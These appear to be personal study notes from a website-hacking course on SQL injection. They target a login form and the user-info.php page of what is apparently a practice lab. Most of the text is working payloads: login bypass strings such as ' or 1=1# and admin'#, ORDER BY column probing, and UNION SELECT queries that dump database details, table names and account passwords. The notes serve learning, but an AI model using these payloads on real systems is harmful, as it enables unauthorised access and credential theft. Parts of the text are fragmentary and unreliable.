SQL Injection

Sunday, March 18, 2018 10:25 AM

vUser = rafay
vPasswd = 123456 and 1=1

SELECT count(*) FROM accounts WHERE username=vUser AND password=vPasswd

SELECT count(*) FROM accounts WHERE username='rafay' AND password='123456 and 1=1'

123456" and 1=1

SELECT count(*) FROM accounts WHERE username='hassan' AND password='123456 and 1=1'

126' or 1=1#

SELECT * FROM accounts WHERE username='hassan' AND password='126' or 1=1#'

123456' and 1=1#

123456' and 1=2#

123456' or 1=2#

123' or 1=1#

SELECT * FROM accounts WHERE username='hassan' AND password='123456' or 1=1 #'

or 1=1#';

123456'#

123456 or 1=1#

(1) Test the page with wrong entries e.g. '

(2) Test with actual password with (123456' AND 1=1# ) statement.

Statement is right and will login

SELECT * FROM accounts WHERE username='test' AND password='123456' AND 1=1#'

Statement is wrong and will not login.

SELECT * FROM accounts WHERE username='hassan' AND password='123456' AND 1=2#'

Statement with wrong password and with (OR) statement with right condition e.g.
SELECT count(*) FROM accounts WHERE username='test' AND password='xyz' or 1=1#'

Injecting code in user name field with correct user name and comment (#) so rest of the statement not executed.
SELECT * FROM accounts WHERE username='admin' #' AND password='1'

Admin'#

osamao

Website Hacking Page 1

Discovering SQL Injection if GET

page=user-info.php&username=adnan&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan'%23&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' order by 1#&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' order by 1%23&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' order by 100%23&password=123456&user-info-php-submit-button=View+Account+Details

Find no. of columns using order by

Finding other information using UNION

union select 1,2,3,4,5

page=user-info.php&username=adnan' order by 100%23&password=123456&user-info-php-submit-button=View+Account+Details

union select 1,database(),user(),version(),5

page=user-info.php&username=adnan' union select 1,2,3,4,5%23&password=123456&user-info-php-submit-button=View+Account+Details

page=user-info.php&username=adnan' union select 1,database(),user(),version(),5%23&password=123456&user -info-php-submit-

button=View+Account+Details

Select * from accounts where username ='adnan' and password ='123456'

Select * from accounts where username ='adnan' union select 1,2,3,4,5# and password ='123456'

Finding Database Tables

union select 1,table_name,null,null,5 from information_schema.tables

union select 1,username,null,password,5 from accounts

page=user-info.php&username=adnan' union select 1,table_name,null,null,5 from information_schema.tables%23&password=123456&user -info-

php-submit-button=View+Account+Details

page=user-info.php&username=adnan' union select 1,username,null,password,5 from accounts%23&password=123456&user -info-php-submit-

button=View+Account+Details

Additional Resources
MySQL Community Edition
https://dev.mysql.com/downloads/mysql/

SQL Tutorial
https://www.w3schools.com/sql/default.asp

Uicode URL converter

https://www.url-encode-decode.com/

Website Hacking Page 2

Website Hacking Page 3